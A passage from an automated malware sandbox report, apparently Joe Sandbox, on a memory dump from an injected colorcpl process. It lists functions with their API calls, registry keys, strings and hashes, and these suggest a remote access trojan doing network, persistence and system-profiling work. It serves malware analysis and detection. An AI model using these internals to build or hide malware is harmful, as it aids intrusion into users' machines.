                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EA9
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EBA
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EBF
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EC4
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664ED1
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664ED6
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                            • String ID:
                                                                            • API String ID: 3658366068-0
                                                                            • Opcode ID: 4e6d13b248690acabcd84951799c4fbd9f22ccb760e0d19f77dabb7aa65689f2
                                                                            • Instruction ID: e7ad0b7971a93525f141c3ff17f527f6890d0abee398aacdbe8c885ff74d4bef
                                                                            • Opcode Fuzzy Hash: 4e6d13b248690acabcd84951799c4fbd9f22ccb760e0d19f77dabb7aa65689f2
                                                                            • Instruction Fuzzy Hash: 93213B31550B00AFDB316B25DC49B16BBA1FF4132AF114A1DE2E301AF0EB75B855DB98
                                                                            Function 0466DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0466DBD5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                            • API String ID: 82841172-425784914
                                                                            • Opcode ID: e1613319dfcc8bd3047b949e24107120e9448a74bed2bb74c887a11a9b4036ca
                                                                            • Instruction ID: f943d9af28523ef430da49ab34f1c3fef67c4e0a25a1eae88c90027188052134
                                                                            • Opcode Fuzzy Hash: e1613319dfcc8bd3047b949e24107120e9448a74bed2bb74c887a11a9b4036ca
                                                                            • Instruction Fuzzy Hash: 094111712082059BE304FA64DC65CFEB7E8EFA165AF10051DB547920A0FF74BE49CA9A
                                                                            Function 0467B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1099 467b354-467b3ab call 467c048 call 46735e1 call 4661fe2 call 4661fd8 call 4666b1c 1110 467b3ee-467b3f7 1099->1110 1111 467b3ad-467b3bc call 46735e1 1099->1111 1112 467b400 1110->1112 1113 467b3f9-467b3fe 1110->1113 1116 467b3c1-467b3d8 call 4661fab StrToIntA 1111->1116 1115 467b405-467b410 call 466537d 1112->1115 1113->1115 1121 467b3e6-467b3e9 call 4661fd8 1116->1121 1122 467b3da-467b3e3 call 467cffa 1116->1122 1121->1110 1122->1121
                                                                            APIs
                                                                              • Part of subcall function 0467C048: GetCurrentProcess.KERNEL32(?,?,?,0466DAE5,WinDir,00000000,00000000), ref: 0467C059
                                                                              • Part of subcall function 046735E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 04673605
                                                                              • Part of subcall function 046735E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04673622
                                                                              • Part of subcall function 046735E1: RegCloseKey.KERNEL32(?), ref: 0467362D
                                                                            • StrToIntA.SHLWAPI(00000000,046CCA08,00000000,00000000,00000000,046D50E4,00000003,Exe,00000000,0000000E,00000000,046C60CC,00000003,00000000), ref: 0467B3CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                            • API String ID: 1866151309-2070987746
                                                                            • Opcode ID: 6a61716b2643a0f15f7e432451412f8cb8446661dff3317f341ba4772175fb88
                                                                            • Instruction ID: 1e6b37cf37eeedeba23c95f69432bcb12d1dbdd317358d8dbda0dfd91e3de931
                                                                            • Opcode Fuzzy Hash: 6a61716b2643a0f15f7e432451412f8cb8446661dff3317f341ba4772175fb88
                                                                            • Instruction Fuzzy Hash: 9C118860E412456BF704B368CC8EEBF7759CBA1618F84012CE407A32C0FA647D4687E9
                                                                            Function 046AF3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1173 46af3da-46af3ef GetEnvironmentStringsW 1174 46af3f1-46af411 call 46af3a3 WideCharToMultiByte 1173->1174 1175 46af447 1173->1175 1174->1175 1181 46af413-46af414 call 46a61b8 1174->1181 1176 46af449-46af44b 1175->1176 1178 46af44d-46af44e FreeEnvironmentStringsW 1176->1178 1179 46af454-46af45c 1176->1179 1178->1179 1183 46af419-46af41e 1181->1183 1184 46af43c 1183->1184 1185 46af420-46af434 WideCharToMultiByte 1183->1185 1187 46af43e-46af445 call 46a6802 1184->1187 1185->1184 1186 46af436-46af43a 1185->1186 1186->1187 1187->1176
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 046AF3E3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046AF406
                                                                              • Part of subcall function 046A61B8: RtlAllocateHeap.NTDLL(00000000,04695349,?,?,046988C7,?,?,pth_unenc,?,?,0466DE9D,04695349,?,?,?,?), ref: 046A61EA
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 046AF42C
                                                                            • _free.LIBCMT ref: 046AF43F
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 046AF44E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: 3cebab70261c6fa6b21ca44f928ff565382c4f19bc5b9f0e82d88f3423f3d02a
                                                                            • Instruction ID: b8c066639374da876f15a699087c29bee730693c7728f6e59c324b70e4ecea5c
                                                                            • Opcode Fuzzy Hash: 3cebab70261c6fa6b21ca44f928ff565382c4f19bc5b9f0e82d88f3423f3d02a
                                                                            • Instruction Fuzzy Hash: 7B01FCB2601B117F27255AB65C4CC7B7A6CDFC6FA5354012DFE04D2301FA649C1299F2
                                                                            Function 04664F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1190 4664f51-4664f5f 1191 4664f65-4664f6c 1190->1191 1192 4664fea 1190->1192 1194 4664f74-4664f7b 1191->1194 1195 4664f6e-4664f72 1191->1195 1193 4664fec-4664ff1 1192->1193 1196 4664fc0-4664fe8 CreateEventA CreateThread 1194->1196 1197 4664f7d-4664fbb GetLocalTime call 467bc1f call 46652fd call 4662093 call 467b580 call 4661fd8 1194->1197 1195->1196 1196->1193 1197->1196
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 04664F81
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04664FCD
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 04664FE0
                                                                            Strings
                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 04664F94
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$EventLocalThreadTime
                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                            • API String ID: 2532271599-1507639952
                                                                            • Opcode ID: c2d1457fad819644e11fd101f0b0e774cac5edd76ee7620a4cfcae67fe653250
                                                                            • Instruction ID: eab6ddc4eeaef5ae75d669dc634532c5f86029d3b695e4c6b18734c4d4b836e1
                                                                            • Opcode Fuzzy Hash: c2d1457fad819644e11fd101f0b0e774cac5edd76ee7620a4cfcae67fe653250
                                                                            • Instruction Fuzzy Hash: 0911A3719102847AEB20AAB6980DEABBFACDBD6718F04014EE44352240FAB4B445CBA5
                                                                            Function 046737AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1207 46737aa-46737c1 RegCreateKeyA 1208 46737c3-46737f8 call 466247c call 4661fab RegSetValueExA RegCloseKey 1207->1208 1209 46737fa 1207->1209 1211 46737fc-467380a call 4661fd8 1208->1211 1209->1211
                                                                            APIs
                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 046737B9
                                                                            • RegSetValueExA.KERNEL32(?,046C74C8,00000000,?,00000000,00000000,046D52F0,?,?,0466F88E,046C74C8,5.1.2 Pro), ref: 046737E1
                                                                            • RegCloseKey.ADVAPI32(?,?,?,0466F88E,046C74C8,5.1.2 Pro), ref: 046737EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID: pth_unenc
                                                                            • API String ID: 1818849710-4028850238
                                                                            • Opcode ID: 60fbaf19e94c8c2447453dc660d52a6ced6282696709eb5308b1dda9154ad634
                                                                            • Instruction ID: 0af659df36a42d5700568c709b978467f4524c732df1724e85ecc3b91597d4af
                                                                            • Opcode Fuzzy Hash: 60fbaf19e94c8c2447453dc660d52a6ced6282696709eb5308b1dda9154ad634
                                                                            • Instruction Fuzzy Hash: 1BF06DB2500118BBDB00AFA0DC45EEA3B6CEF05650F108558FE06A6250FB35AE54EB90
                                                                            Function 046A39AA Relevance: 4.6, APIs: 3, Instructions: 115COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1294 46a39aa-46a39c6 1295 46a39c8-46a39ca 1294->1295 1296 46a39f7-46a3a0a call 46a5b74 1294->1296 1297 46a39cb-46a39ce 1295->1297 1302 46a3a0c-46a3a0f 1296->1302 1303 46a3a85 1296->1303 1299 46a39d0 1297->1299 1300 46a39d1-46a39d3 1297->1300 1299->1300 1304 46a39d6-46a39e0 1300->1304 1305 46a3a6e-46a3a71 1302->1305 1306 46a3a87-46a3a96 call 46a6802 1303->1306 1304->1304 1307 46a39e2-46a39f2 1304->1307 1310 46a3a73 1305->1310 1311 46a3a11-46a3a13 1305->1311 1307->1297 1309 46a39f4 1307->1309 1309->1296 1310->1306 1312 46a3a16-46a3a1f 1311->1312 1312->1312 1314 46a3a21-46a3a31 1312->1314 1315 46a3a6b 1314->1315 1316 46a3a33-46a3a36 call 46a5b74 1314->1316 1315->1305 1318 46a3a3b-46a3a41 1316->1318 1319 46a3a43-46a3a52 call 46a7be1 1318->1319 1320 46a3a75-46a3a84 call 46a3aa4 call 46a6802 1318->1320 1326 46a3a97-46a3aa3 call 469bd68 1319->1326 1327 46a3a54-46a3a6a call 46a6802 1319->1327 1320->1303 1327->1315
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: bb39bd56396c9fd3e2b7dee2534384dd3e4f283d0e142ee7b1748c061feaea88
                                                                            • Instruction ID: bf0601766dbcdc3377d158ebb83d2ff9033c8ee050511feb489b56f2af664359
                                                                            • Opcode Fuzzy Hash: bb39bd56396c9fd3e2b7dee2534384dd3e4f283d0e142ee7b1748c061feaea88
                                                                            • Instruction Fuzzy Hash: E531A037900920ABDF24DF6CD8419BAB3E8EF44754B14405EED059B340FB31BE91CAA4
                                                                            Function 046735E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1369 46735e1-467360d RegOpenKeyExA 1370 4673642 1369->1370 1371 467360f-4673637 RegQueryValueExA RegCloseKey 1369->1371 1372 4673644 1370->1372 1371->1372 1373 4673639-4673640 1371->1373 1374 4673649-4673655 call 4662093 1372->1374 1373->1374
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 04673605
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04673622
                                                                            • RegCloseKey.KERNEL32(?), ref: 0467362D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 852c19a36a410501df39133a85474a63f7d5ec4b3a78bb114efcbba6425bf1f5
                                                                            • Instruction ID: 4e24ac4855eb5326003cff7579c474a70b0803fdef2af69aac40af514757ff5b
                                                                            • Opcode Fuzzy Hash: 852c19a36a410501df39133a85474a63f7d5ec4b3a78bb114efcbba6425bf1f5
                                                                            • Instruction Fuzzy Hash: 300162B6A00128BBCB209A95DD49DEE7B7DDB84650F004159BF05A2200EA745E99DBA0
                                                                            Function 04673733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 0467374F
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 04673768
                                                                            • RegCloseKey.KERNEL32(00000000), ref: 04673773
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                            • Instruction ID: faaea32df6134c854a9bd56f52b4da7985908b55d34398b4e2c430b6ad7493d2
                                                                            • Opcode Fuzzy Hash: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                            • Instruction Fuzzy Hash: FC014BB1400129BBDF215F90EC44DEA7F38EF05354F004154BE0962110EB3699A9EBD4
                                                                            Function 04673584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 046735A4
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 046735C2
                                                                            • RegCloseKey.KERNEL32(?), ref: 046735CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                            • Instruction ID: 3edcd3bc94c04a42a11fe67e2131c6c1e6b56ae827d723e3c01fc398759753ee
                                                                            • Opcode Fuzzy Hash: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                            • Instruction Fuzzy Hash: F2F0A976A00218BFEF109EA09D45BE97BBCEB04711F104195BE05E6241E6755E98EB90
                                                                            Function 0467353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0466C1D7,046C6C58), ref: 04673551
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0466C1D7,046C6C58), ref: 04673565
                                                                            • RegCloseKey.KERNEL32(?,?,?,0466C1D7,046C6C58), ref: 04673570
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                            • Instruction ID: 34bf71a68fb5605959708d58bc364e7cab151a7a68ac735cf0e6df50f3c12611
                                                                            • Opcode Fuzzy Hash: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                            • Instruction Fuzzy Hash: 67E06572902138BBDF204BA29C0DDEB7F6CDF067A0B004144BE0891200E2255E94E6E0
                                                                            Function 046738B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,046C60B4), ref: 046738C0
                                                                            • RegSetValueExA.KERNEL32(046C60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C18D,046C6C58,00000001,000000AF,046C60B4), ref: 046738DB
                                                                            • RegCloseKey.ADVAPI32(046C60B4,?,?,?,0466C18D,046C6C58,00000001,000000AF,046C60B4), ref: 046738E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                            • Instruction ID: d07e57c64af4a9495ed82392a52fac2e841c0407342ef026067240f59ca44548
                                                                            • Opcode Fuzzy Hash: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                            • Instruction Fuzzy Hash: 90E03072504218BBDF105E909C05FEA7B6CDF04750F004155BF0496240E6395E54EBD0
                                                                            Function 0467B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0467B85B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID: @
                                                                            • API String ID: 1890195054-2766056989
                                                                            • Opcode ID: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
                                                                            • Instruction ID: 24f01c2f939f861b70af8df85cc8e4c357a4de8ad9de5488374fccbce0bd84ee
                                                                            • Opcode Fuzzy Hash: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
                                                                            • Instruction Fuzzy Hash: C6D017B58023189FC720DFA8E804A8DBBFCFB08210F00416AEC49E3700E774AC008B84
                                                                            Function 0466482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(?,00000001,00000006), ref: 04664852
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,?,?,00000000,0466D2DD,?,?,?,?,0466522E), ref: 0466488E
                                                                              • Part of subcall function 0466489E: WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventStartupsocket
                                                                            • String ID:
                                                                            • API String ID: 1953588214-0
                                                                            • Opcode ID: 358afa429dc95ab15eaa70265b67698198394a4e9c563d52d5b7448fdb81d5ea
                                                                            • Instruction ID: dd8d22be7f471f9f1d98dc15ed14db76a4d4a88972890208d6e5847e37e4340e
                                                                            • Opcode Fuzzy Hash: 358afa429dc95ab15eaa70265b67698198394a4e9c563d52d5b7448fdb81d5ea
                                                                            • Instruction Fuzzy Hash: 7501B170808B808ED7348F28A4443867FE4EB15304F045D5EF0CA83B81E7B5A441CB14
                                                                            Function 046A382C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: ef2b898e8edd5a688d110245268474ba090d56c6ed09472b633ccd13a5304737
                                                                            • Instruction ID: 8452b1e82c2b49fcc77382b0994a184a1b54a5446dee7c9f4eb08ba53a33ace0
                                                                            • Opcode Fuzzy Hash: ef2b898e8edd5a688d110245268474ba090d56c6ed09472b633ccd13a5304737
                                                                            • Instruction Fuzzy Hash: EAE0E532B02E2018F7356239AC2065A018A8B81278B11026EEC21D63C0FF64BCA24EA7
                                                                            Function 046A3885 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 6b9fa72946c23154626c712f09e3589e5c888f8fa693861ab7496c30fb3fa1ed
                                                                            • Instruction ID: 4e54f542d702e0ffa1cf827936e5b883ddbc86375be8a004e433e1424ee4c018
                                                                            • Opcode Fuzzy Hash: 6b9fa72946c23154626c712f09e3589e5c888f8fa693861ab7496c30fb3fa1ed
                                                                            • Instruction Fuzzy Hash: 22E0E522A06E2041F735A639AC14A5A02899BC1239B12036AEC24C63C0FF647CA25867
                                                                            Function 04674F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,046D2ADC,046D50E4,00000000,046751C3,00000000,00000001), ref: 04674F46
                                                                            • WSASetLastError.WS2_32(00000000), ref: 04674F4B
                                                                              • Part of subcall function 04674DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674E10
                                                                              • Part of subcall function 04674DC1: LoadLibraryA.KERNEL32(?), ref: 04674E52
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E72
                                                                              • Part of subcall function 04674DC1: FreeLibrary.KERNEL32(00000000), ref: 04674E79
                                                                              • Part of subcall function 04674DC1: LoadLibraryA.KERNEL32(?), ref: 04674EB1
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674EC3
                                                                              • Part of subcall function 04674DC1: FreeLibrary.KERNEL32(00000000), ref: 04674ECA
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,?), ref: 04674ED9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                            • String ID:
                                                                            • API String ID: 1170566393-0
                                                                            • Opcode ID: 5d098856b2ac754d2c90072612b13f74cbdd8bbdc8cff5edc33a74b802ea24b7
                                                                            • Instruction ID: b8517bc942febd1966bfa46c24623f763f5d18e8093c20e530c25d5265d54855
                                                                            • Opcode Fuzzy Hash: 5d098856b2ac754d2c90072612b13f74cbdd8bbdc8cff5edc33a74b802ea24b7
                                                                            • Instruction Fuzzy Hash: E6D05E32A015216FE320A66DAC08FBFAA9CDFDA764B050127FD00D3200FA98AC4147A1
                                                                            Function 0466D0A4 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0466EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,046C60CC,00000003,00000000), ref: 0466D0B3
                                                                            • GetLastError.KERNEL32 ref: 0466D0BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastMutex
                                                                            • String ID:
                                                                            • API String ID: 1925916568-0
                                                                            • Opcode ID: 635f69ab504e9c0c6c815cb55cc7baeba813c6a7a8a6ab02be29704d9aa8ea17
                                                                            • Instruction ID: da16ee82bd7fe697add52a6afb46900b5e8e332c19db04287334ca72cb431724
                                                                            • Opcode Fuzzy Hash: 635f69ab504e9c0c6c815cb55cc7baeba813c6a7a8a6ab02be29704d9aa8ea17
                                                                            • Instruction Fuzzy Hash: 20D012B0E15200ABFB186B70945975839A4D748702F40541DF207D59C0FA788CD48551
                                                                            Function 04669E1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID:
